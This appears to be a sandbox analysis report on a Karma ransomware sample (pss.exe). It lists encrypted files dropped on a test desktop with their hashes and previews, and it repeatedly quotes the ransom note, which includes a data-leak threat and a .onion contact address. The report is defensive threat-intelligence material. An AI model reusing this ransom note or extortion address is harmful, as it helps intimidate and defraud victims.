Preview: .A."Nmu.k..}-..Y*...n.s.u9......*...0...M06XY<T.T.~N..1.....KARMA..h....,....n....IeV..c..3Q.A..H...$.Mo....>.X.o..M-.3Q........x.`...|...7......V#.j.~....ak.{.R...Z....9}...y......R.Wt.Y49...........&1}.....u...4=...5....&.A.{.....#.ek(.\..^._.....!.c...&&..m..mc.Z...e(.....6..].6.."...G}.l...>~V..kD.z.7?.[.n...;..6..i...*..0.....u.....nQSZ.L|.@.iZ.vhO.....P..:[=ip.E../Td...n....N.{.*.<icBy..;J.*.6..K...- .......z.A.l..'...7.4)....h...(.].*....k.$..P....q.7.Xw.Z....IWv..v......U.".`.;...L......a.....Y9.fd(..p*o..Xb[.-..J.. ..*r...2...&S..Q..w|up...F.J.QD..v.M{.5+....X.#r..L.{..Pb|.[......s..;.P..h..Bl..V......Pv.t..Ot....0.>..F38......e~1........1....d.....~.k...K....!#...%..Pb.....)Y..V..N..r.g{)..^.Y..1.VB.9........4k4..........;..I.>.....+.a...w*...>.).O.k.....<n..m..H.|.H]...7.d~v.g0..mY...[T..&....r4..*.......}..Pp.....b\.....2.@."... .Z-..Z.#0.l.yG..?...,H......Ke........l.@.=jF......)j.L..R....G4.vj+..[F.W.l.s(..-...
C:\Users\user\Desktop\BNAGMGSPLO\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\DUUDTUBZFW\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808408298574005
Encrypted:false
SSDEEP:24:i9gyeCSCVNPvQPzCXrzQykbDOEuxWw8aJwfi0zg:i9rfPILCYyADO4w8aCi08
MD5:7C3F64A08192EAAC0FE31FAD5F5FE17D
SHA1:294CB6345580378CAD00AD0FF735C71348D6C5E9
SHA-256:5408885F34B002A2BF7F62D1B640DEE2E5A83FEE27F1D608B2C27CB468E5F0ED
SHA-512:CDBBED517E7C0C3BD14D966C15E76482326371F0214D119B1041422973F250CE34AABCA26656EF00095A7BB186E8DDE628AB72C64452C5E7AABD311FDCAC6985
Malicious:false
Preview: .{e.H....f....QY.,.HIt.b..........U....!.......W].b..T.7y.....KARMA...{..+..R.Ex.g..j..]....qrF'.g.%.....8.h..6..<...G..,...N.0g.....}...w95.....Z#2...1.T.j3].VZ.z'[.KW...MO,BN...*[f.4. ...W..+.P.......wg.x.6:...b.}V....^.A4c....@d%.......9...pv..u.......@....D..ag^:.~.........$a.w.......[...8P..%..R{...!S/....>.E.#...tw.P.jnu.....g#zB..Fu...q. {...A.eM....9>(.e..s......*........"\.P...=...Osd.0.V..Zh..[_@P.U.?.W'.y[...E.@..y..Z.=K..Z9.......t.^....X..C.S..(..O...:..B.o.,.....EW...-.f+....=...X.*..... )z.\..!..x......E....v....nM..Mwu..PI..Gu.ou......x...R..2Z.).y...8.3..~.<.xS..I.9.I.i...%.a..x..../.....w..46.2Hw.`..x..r.m!V..CVm...su.b~.....egN.+.}.WO...m.......9...G....6ZPa.2V....p.o.E...XB.+....N.*J,.!.e^....&....!..x39.....{.....5.Q8`...j...T...2.......Y.%..u.Tt............Y;.o.........F...3@.f...a....s......z.k...=.9K.8...J.d.II.K.........8...8]...A".f.b.... X*.?..Gqc..Hm.*..F;tSI....FWZ.Y..,/.0h.........Oq...7.
C:\Users\user\Desktop\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.825390699299319
Encrypted:false
SSDEEP:24:fYj+1UAwKmdyUAS8I6E0V45yMuDdIi4BqaJr+WJAxIgOqp:fYjSU20yUAZp/yiS+NxImp
MD5:70B8753BB43F5B239F176592C6175819
SHA1:77D81D9BB7AFF498564555BD638A331B33F9FCC6
SHA-256:5CF6FEED893D7C145014012899C0A8CE929A392729B775E655C4E1B73DD0FBBD
SHA-512:7AADA4CEBE30E13E5E5A592FB604D85AFF978787D1E2D04FFDD05DAA114F51D7409A16CBD9BE502A7C62C493D2476D4E43B9EE574AD4726B5961E685EF8DA00D
Malicious:false
Preview: {\.H..V.f..0.....Z.:%....W.u......8...V+....W36}..y.5(.nn..[....KARMA..9..#X..<}.....$&.....t....I.eQ8.<.xI.h!]..........~..!..q....|7..y.{u.#u,.C...hn..M..T0.....0v9).R.....C..Z.....]...-........{~..[...Z..$..rC4`.....)..B.kC....".K{.n......I..\,...^........Q......w/s.Q6....AQ~.q..wg..3.e.t0..b..2S*.^...".Q..d..\.5.....=.LB.._...f7.$.gZ.[...*X..../b.<..^.f.H./.nW.Ov..3....I..<.d.xG.e.Z....$A9....f.._Xy;..Mzlu..........)..YK,.....H_..n.i%F.].!.......zunEu.i...%..=q."....}$.<.V]..<...!..s4}..<..@_(..i8....... .s.8jF1Y.c.~O.VQ.eK.G?....p.K...X.{...|8.5].X.d..b.5U.q>...t..^.Z....m.c..^w.*..Wb.c{q..>s..}.4....`2...[.,M_.T.,...m*.9.{@.VT[..L.@..?......? _vFM.E&.}.w...(7a+_.A..yN2..{e...?......F}\...{L..O~.R......?qu..o..Zj_.<8..n4.) ..]9.;..r...K.m&N.rvuge7,~.......\....g.h...[...!x.s.F....<.SBr...'3..cA.C.?L....a6mw..C...E6k$...6.w.:.......2i..w.....`P2E..,IY.{d5|w|_...S.../...G..>e..C....]w..l.2[b......N.'..2.).o).K&..i?.(...
C:\Users\user\Desktop\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822077045349632
Encrypted:false
SSDEEP:24:r0WgD2WEXt0jLh/oZ+f6/d5E7+zpMmbv7kj/P3xOWp58t0Y:YWgTbjLe/rEyrDkpi0Y
MD5:18762232B1E12D3B57BF1672262F1C30
SHA1:AF05AF0017AE501FD7161016A193FA6A38994A1A
SHA-256:FD65251A41BA0D978B57AAEAB4BEBB9626950E4B21432190DEF47A13E17BC625
SHA-512:84A4C2047BA0A23BE3B65988AD8C9AD8E8B13CD5DC6E59070A4DB25A7ABC5A660E23B1765840D174EE8258CD8FDA605001E4483640FA6BFFC517DB382E2A8C39
Malicious:false
Preview: ..@.Wa.:3..]U.1.!...~.H.DR....yS.2tn9r............@...W...KARMA.J.^..h.P.w..\h...@...x.b.0...GB.n..%=.rY.?.3~.........>.{`1h..e.I%.q.g.:iD.e.p8m..T.^>.G.z..j.Z0.h4T....D'....{.<./..<.2.n.,.B.z..`....W...Y}L5..$..."..j_A.......LR@?Zg.e..N..A...l.1..`.....oA.e.r...5Mv...p'..._.N..$...=.Gy..|...j.8a2S....B...D-..H.....n.U.<...vq..A..A........l...@r..'...O>.v.J.,jQ..m...w.....8.....j..$.y[{.......h...F.}.+....L.>.eJ.}.k.O..f.[ly...#.8y.$s..1.6..W........o....W....e..D...L.T].j.......=.5.Y.,%&z.-...o..ze'..O.J.sr._...%p....G.....gP.jk.H.6z..f$.,...y.q..HY.=.....U..?-.wN|....Y.....\F...@).1pAf....rTF....FC.nL..N.?....-d......hO.mf....3+.....i.n.E.<TW(k.....'\.'..R.[K..(.0......|q2.a.n...[.V.....&.....e.&.O.y*".....E. .U":.8.L..l..... _e+.@S:.V36.....p..w&..5.....wA...TWhN..S2.M.G.UM..D...r=.]?ce.|.2.Q.F..?*p..V3'8..`=DD).0.:w..{.K.GO.1.@B|B..D...S}.^.%7|.......2.e.P.........m....X.....m...M...r...iO.....~./.....x..v..-.../.....=.J..,..~4UWjg..>...3
C:\Users\user\Desktop\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8026531878921945
Encrypted:false
SSDEEP:24:5g1h7d4FX6FJIcQaPDOZL6FpnuBKHyL6SXkMx6EWmpf6VS4:5gr7dcKFWcFKZLEnuBK1SXkMdWHU4
MD5:57E5A8A0B4D0F8ECB16D63E4F403411C
SHA1:C94126ACA4FB4642750D00B1977EF8448489BA77
SHA-256:418B82E5B2D93FF9A08989319EAA262EF6E63A540C2384F63953FAB6F208C36D
SHA-512:9DF0669F44697CA0BDF3D1E98FB159B72005957BDD3CBA26EB47E79FDE19557E8566F1E0AE66F4BFA62963F55BAAE4109D20C227E9D27010C2456B10A093B945
Malicious:false
Preview: .3..pC.W.%*4Y$..M.&...P.h".P].... .=...".%)}.c.R.z..[Lm...Lh....KARMA..../.<.LO..lw..../.....!.{S...^$....LT].yd..."..Y.;sy_{.N.9....^Q|.k.w.T..$..hO.p1Q..}.....6.r.H.........d.G......DB.HB.V./...`/..*HO..<..4..r...WaX;......H.....3/.,..5.8..b...I..y.4j>..<.u...3Z....K|qO..k.\..t...<... .8.}e.?..!..;~..\.c...k......+.b2.u..4E..b#..h.v"...........;.2.^j...ct?.pr.G.c.....-u,..-Z.rX...//....M.*....L..J<..../.G..\.e.9d.....C(xn.6d..C....5l...{H[.}tIV.....} ...9%".,...4\;...1....._^.*MA. .w.T._.P.^...w:.p.`.......w.jL"...4..nk.....a.[Y...pU[......r.N.dj....cu.?.1`.Q(o.b..9'.S5k.6..M...$.]P..[bz..4..*..u..9.$.....5.9{0$..1...../.yX..Uiu..........1-...f.3w..T...c.I....H...e..X..(..^.<.v9...3.r.C..;=D...FfY.$..T/....C>....{>c..X...:x.|...g.me.C.U...L....."Z....>&.....R...$H..U.4p.U....nR.y ;........R..f..6.r.Y..G.....L.u..7^.Y<.R.<H..;.5.....#.....bUg...8..{..x.DFP...z.j.A;......."....g_...:.....=u`.".~.T^..*.*8..q4.....E.\.&.v......Lw...f...>....
C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829657089271315
Encrypted:false
SSDEEP:24:zNfCf5dN0hd+kQKdfu0TRYLdNH0wMjzg+c/:zBCfy3+bKdTaBNCjw
MD5:7574183793DD80CB429EA748740B526D
SHA1:6B9298AAA1EDA4AC76032FC24CAA7694B42CA8BD
SHA-256:4E78D6142409C842F363E1AA7838194E7EB3CDC5DF8BF2A27E5ACA4DE48A344A
SHA-512:0549B26883D00AE96296CFAF3C48BFB4F3BC6D97E224840847FDE7EE90C155422B712110501E53912E261B9DE8C12298650E8DF2AA98756A836DD21266750DE2
Malicious:false
Preview: .D.k.l(M.&K~.f.H.!+.w..$._.....n.z.h9.E.!0F...o.G.v.M........KARMA.....~..7.D.@..' .$h....V..G..@.$%.j....8.^.c..H...yQ...|+.V.O.Hx...V....m..`.Au)l...D.....%u.._..R.<.J...m.>J..7x....^....a....U..B."..h..^%..[3.3...{.`t....u...P.......V...4T.....;t....hN..m.....9.e3h.......l.....`......!.|..}.H..._*3.V.... ....Lg.(tN..'..{...^..{,;8.u.31e.v.a[w......uU)..J.HF...;i.o.ge.......Ao.....(..e...=.iRCU..q..5.Vl..A.We....:z'\.ua.&N.n.thm.cvN..F...[...Xm.8........1Z.s.V..u\g..E..-7....{...B..M..*.=..t.......)l.b..,a.-.N.zg..w.R.,...9.......<.I.W...m....!._{]....m.f..FJ2...?.-.o0.<R.*.N..%'..F:.ym.j;Dj[.r....J.....7.....g.^F.....!....s1.).........D.L..[v,\..'R.).L..T.kI.Uk.<..^..p23p..bi...E..)C..J...gB.s.|k..)~.j./..^......;U."d.k.d.i.Y.=..1..:.....]...@.]........O.>!..J.X....# ..o.!....qiEjJ.....,l..:....(SWz.F_Oe..a-...yq._..->?}....C...K.....~...$.[&.N..H.G4.....Xw..6F.1..|.(v4{.{.8n.1;.?.~-.z3..NnX.^.1.t...X.!5.....gp<.p...0'...q.0y..~.9....fP..
C:\Users\user\Desktop\GAOBCVIQIJ\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\GAOBCVIQIJ\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82408303678608
Encrypted:false
SSDEEP:24:kgsFb9ZQBbePoZN/rTEu8xao0imBPDwMY9yqVWkxrAbYaH70TgIlXn4:kzJY+oZtbGj0/VkMY9H0kCEo0MB
MD5:C693F4348FB549A0E912F3519A2563CF
SHA1:6316781F0508ABF2E5EAC2AE0819E08938872154
SHA-256:F8566E49754FE3FCCC276504A9F0B4DD1F0C23C3D1826746D529CAE77B60DED4
SHA-512:8A3FA878108C9E3F55B44CC6CD41F20A6A05EF290ABAFEBA2072C4DA7EFFF2B9CDC7821EFEBB7FD3B6E65AF7C05517177A39EC8477AEC4659F31798D163673A6
Malicious:true
Preview: BI....RtbK...'....d..d...........Fg$~.QXl.Psi|........J2......KARMA......:xx.ok(....P....5.m.FE;^].bX...w.Q..$u.8....._....C....S.w...x=/ "^f...I.....`..n9.c.q...v...:..O..V............J...h..|`..7[..+..?C3...H(|ua...\..m...^'n...J. ~....e...N.w)8..tCL+.........==.4.......aif'O.T@..>.I.@...>k?W$....v....]...JG.. m.3.FA.LV.....QN..kH*..O{ZS~.r......H<........'.E.mt..'.rVy(~..h(...Z.I..n.j...7....S].q~.H...{.............O..Z..=...+..8..DG.>.vCe.4.....+.....6?0...U.+..IlQ7Q.l.p}....}gNg..V.wHY....1ic.+.$..0..G2NW0..i.A....s...9-.0}.... ....Cp....*...@U.....x9.M+.J.*X.YB..P=M.ft8u.WM...X .......v...a#n.boS.2...T.%'z....$Z.....P/....[..+.C.K.c.....dxYv..._...M..Y.p8f.&/14 .......5..=8.5M.K.7...o......z.... .Y]`.t...t...V...A.....NRZ./.M.........y.k.H@_.d.,.s..@..Ay$\............f.&..N....%OFh,.!.Ae..*.....k{...<.T.)H.(....!g..8R.#."..Lf.C@%'.N..ev..%;:..&S.Q.%...X..W...O....6!....(.@S.L..;E...B..[u.QM^.!.C*...Qq.... @N.z..(.......7v.3..P....z
C:\Users\user\Desktop\GAOBCVIQIJ\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.848759370626013
Encrypted:false
SSDEEP:24:6ULzwc8GzlL3ZsPd1CGuwfZZJnHb0h25hPp5poVuqs6HfjnchtL9:6UHLppLSPd1iwfNAh23PpsVlsWEt5
MD5:2262A9AE75A2911F4C1DAA5AA1D07097
SHA1:28B74610BCD74B12E520BE708B0910C367274591
SHA-256:33AC5AE54DD113B3B4DD3845A80E9E69A91D5F13BE6B0D91C2204A5F39925155
SHA-512:369CD40E2BB761B3F68FF00E20AC3880C576802A8B1B0610AAF5A4BAAA98FD88AFC8689CB19D1F74B06C4C686E48B6591F2C8E5D6FE03567E24D0BDF56F6938A
Malicious:false
Preview: ..,....S+....p..........G.....f..} Q..9..]..#a......Y7......KARMA.w..[. <. ..f.....`..>fWB.6...8?......x.{j.%..G......AP3.X...K.....X}...l.+...1.......c.......g.Pc...R...Q.l..3/...E)...%(S_..c..U.n...B.f.N....r.^-,.e.>=<...1}. 6~5.sR(..s.....><L..ok@.~....R;..%..i.!].....*..;...'.Px.X..R..>......F:-A.5..T.....#3O.........o!nht.K..m'.p/.r....e....., ....7.....F...W..59........... nE6.....'...'..LaP..`.....".^w..o..U..c..=.z.Q.*......2{..$.".WX...%.G!Y.M...7._..O......Re....|.N..X.. K`$.e.....G...9C..4.R.Cz/..`..W;.f.7f...l. e..&T./..%...d.2M..`..b#-...J.wy~*..$....J. .^.>3/.q8...b.....(...Z2B].W..u.HZ..$f....OoA...eq...w..b..%u+4.#....c9up...cyv..`}.).evZ..Y..z..........AN..d.....T...$.h..g.g...va.u/a.......E.9...MeD`.O...h..L..N...~.....-&`o..m%.T.n.~.......}NOu..'-WV ..[c"wN...4'.........M.+....oWZ=.:H.Gl.1.s...4?.%.9..4s..U.2.Z....+...H ......".../.B..,.z.z.D.v.....y.r.....G.ET....lM../.-9.vZn.I3.%S.!.[....u=.q....S.... .?*...F.Y,..K....
C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.781654596856385
Encrypted:false
SSDEEP:24:NiXlXg5YeFCyF0hrbmaQ1FcI6fQYNyKJ1f70DqmKNSBb:JeeFoG7X6jx1T0DhKoN
MD5:153CBBAD2A155368392A5A8D9234EAD3
SHA1:243184F53174C86794D968E18FF98852CFC7E516
SHA-256:929E64E4EF7BCC42B104589D007290CA58E25FBCF954173BF89FB656AB504562
SHA-512:02AFEDBD86BECCE6F2C766B33BD399FA1F13E4D416DB180F2FAE4EB2291257E0257A0F5B15B493EAD3527BCBCA8A0BB00B3013361E15850AFAE17A25A53942C5
Malicious:false
Preview: .iPM,.y.3...~..q.....v%.......:-...f....a.{.X..sy.k@..9...KARMA.1j.|.N.>I:.(B...As..$Q...Y....A../,.......?.Q&.......4.9R.....3.iRjA...z.vW..,...d...+ U.?...I..2...J..{[5qg.h....W..g.....^D.E....G......{}.....-...YA..b.q."ZhT...@.mU.v....v^W.......&W..~.2.f.....K(..?...E...aS..En..C2iU....1.U.p..O.4.o-%..#j...b..."Z.y,.(..(..+o.?.u...S....S@KW.i.F`..O.~..{.......n;...R.u}.&.I....Cpa....Uj..c..k*Q.-f.../&q.!3|.}.?zoI...l....{O..7.A......0."...l...f...hC.ppf.u. 5D.}.d......@.;].Oe.}...{...0....].'.......e.i......g...C.....L..i..$.^(....,A...UwV..#...E..'i@..T,@.b....M.......6.....^C...']O......aT.w..^X.R,U{..of.n...O.~..3...A.F.Jt.....U......P.Q...!.I?~..:.....M..J...X....|...[.L:}.Go@.U{5..v..^..Bd...TTWC...]H2....i.....\..-.C..pw..*.N*.....BM....K.h.J.Sj...R...|.!......+.B|.#......LKmg..C.._.5.a....h.~.3ORF.O.*.............r....U#...QQ.......C.'...4V.Z.....R.8......3.v.....MN..wa....6..U....]..~eH.......(....[.....>..*.L~
C:\Users\user\Desktop\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805283204109685
Encrypted:false
SSDEEP:24:90yusAP4kqgexgb5bwB6QIixSPi5hIJng36jvhgzihHEh:90y6usOB6QR55hIi3ITHEh
MD5:949F8A1383A7234D478A1346ED21B277
SHA1:38AAAF1A42B3C76277990B4468C36DE38A8383F3
SHA-256:6E2ED81A575E78973BFE4D465B81BBA33CAB8787F5DD5ED27B266DDB9A155DD6
SHA-512:720061A77EF9C26D893D7B9C2588362C5889A7EB1F06756EE72D7B2900F135AF044B72FD74BB34DA3FBC0E74CB9DD2DCDB08CC6D6066176EE5364E4CC838FB9B
Malicious:false
Preview: ......V..T..Bt~....{.P..t.UQ.......!S#(Q..e;t.....b.....?bv)....KARMA..p..bHi.....[>/......F....^:....,8.3....B....\.c..j....a...r6C...... ....JH..+....Gf..3\D....u0gc..,.....:D.*.~.;]....oz...gE)1..2......s..Y4~y....pHqA...^..+....Hk...BSsU)%...3:.+..q..3|......!0.....e..)..c...a...AHN......k.65..i.oD...H.E...9...mh..vL..C.Z..mwx.../r.~.}mF....)..tx..m..L...SDx..RR.lzS.DsA{.k.|M.....p.....%..w"\..Q-nE5O.........y.f....9..p...IG...x.2X..8j2.~...ao.T;..rxq...W....M...{.......9.{.n....9g.>......s..5.h4m4d9..I2.95{.X.z..7.PyY......T.zi.9..3......X..-.`...}p.@.l..>. .g...t:i.R....mci....S..5.w[..=.yL..L}..7.i..M.FGS..J6...GU\..Nv.-.Bc.*!u....9.8..)r..q.....49..&....Y.........$.m"...58.m..-M~.p.g....Y.-...|x.tc[bZ\.D.2`.f.F....9..s.A..\..'..n.......N..YI.`;F.r{'..<..%0.x........;j....u.%....Z"....$-.VV2...7.b...]t...`...hI.v...YB.....'!=O.h..M..`o...P..r..bw`...v.D@.%..y.(...DS...{..M..Q..o....{x...ul....gb8.........0e..^........+..@\..b..D...WxP
C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819085524610789
Encrypted:false
SSDEEP:24:sUA3KFlUtXrCsXOgoyIj/WyGxpu4SmIgOg5OIlwl6r:sUdlUtXrCsegoyIjupf1hls6r
MD5:2830897848C73689F8675CDC3EBE03FE
SHA1:AC4287CCD3BB12F3E742D76D5CA09D6C88EBDF96
SHA-256:FB76E0989C64FB44CD1F9992828259C37A49912A83337F521EDE9C9546B9CF60
SHA-512:8A903F19BE9C9E7A003FE8C7642A30BE2A30E10E03C9069EFD871422C05359E0139DAEFC215A4A97DDC708C46E5D4C23CE79197BBA62787658D1BB208475CA6B
Malicious:false
Preview: S..t.&AU3.`..w].@.p|A..*B.'*........h.jJ>..^|.....q_..p8..W....KARMA...w.{.n.E.d..Z.^.A..ME`J.U.~...j..7w.:?.@...D........h..)k.9.U..4....Tv.|*...6V/..h..,.......+}O.~...l......r..F...><A._5@H%.Ei..t.]#..R*k.......}.H.....L2.q..F..V../Ttz?B.U.o).*..@r...)K....tF.......D.......*..0=...w~+.......x....z.....j...........ytp.......`rZ.$.>.L.....p...0.l.F..Q.H..6...L.+d.S..4.....8=..8...O..@......0..hi. ....M...y.......`qO-.{...f6.d..hb...$.yK-.4.q.C.U<H...d...K.......V....... g....... .l......'D.......+......\.x..5.f6..R.L..O.'.W..'M..1....d..<...X.{^.."Mx.$g.2..v0..7..L..F.g.....K.....c/.2........[...Pox.5...{i.C-o.............#..t/..>..N_}'..Z.c....-Cq.no.3..a.[v....m..*...|.xS..<S.L.!z.$f2m9.9..3a....r.9......i;._.[......a.(.........T.\...@....dWCn....K..)..#py...`.......3<...d.M.gyN...........4[..Q"0....H.N!).T..t..zhY...y.@...Z/..Z..{F.Z~=Kj.........bj#.2.D.w...kDb.c.Zp'..^#&.=.i.4.I..".S4nL".LD...O.......G..G.Sl......B..{f.~......W...4Pb.N.0
C:\Users\user\Desktop\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.794045729889145
Encrypted:false
SSDEEP:24:P3kR5g36plNhY2o7aFvqyAza+O0/ivbq6jsv/GKtHyrV:fWB/NEaFyyPx0/JSsv/GKt6V
MD5:6E0F01658FA8A0EDCEC14B83802F3AC1
SHA1:6BF831E63417E34526D9BB0C38D79A452FD57DC6
SHA-256:0873B2645758BFD356DC9FCE539B20FDB710E7E01DBC791CFD5930FF4C7EA80B
SHA-512:17C5BF442CF7B9B60A6EAB780610F86236EB4F55B8F3EC7C2002862012B162190088B15A8EF0E2CDE0649CE2A23E7E8716AD716A8B26741560830384402A427C
Malicious:true
Preview: .....0.....x...C.wT."(.H.....5..L..N..s...K..n..X..Z.........KARMA.......?).8.&D$.}...Cb.......76..._;U.%..*.Y..9....M.6.h.......+.5..%......q.#..s.....t`.m....j4.e.H%o....PY...(QoO.zGZ..w.eV....:...P..t..4&.{.S.B"y1j.....Y.I.D9_.\..K....0[...I....|.i..........{............9)..?9vz..M.{P]P_8.m....Pv.7..s.Y\_L...ey.....v...Q1.....W.L..)...@.!l...r......t.`.H...=#*U...t..(..e+N.,....IjUN....t..!.........I\E..=.....e...JDS,O..)./.t......>.>...}.]...o.lI..K..%...+.].$B.ax..Y?"n.K{.W/....Kd.dv_.."6^.6.\.K..I..*.......C.m#.E..HX.J.9..(h._..x...6.(....~A...x....`...C.....A.s..Li...@.....?..^.z>...."$.\O...........,.`h.....J.<X...U6.!.........X..2......D;.s..}.u..Nd.e..^..E.c4*.`.6.&....l.'S._!m....L...o{69..3'......K:...r...Y..v.....Uk.n5..;.(...]..!....Z....Z....e....C..,..#......Ce..+.d..=.;`.kA..........a;<..Y..............T..:...I'....'K3.'..u......n.F.?..(_k.i5....}.....`...*..*.. 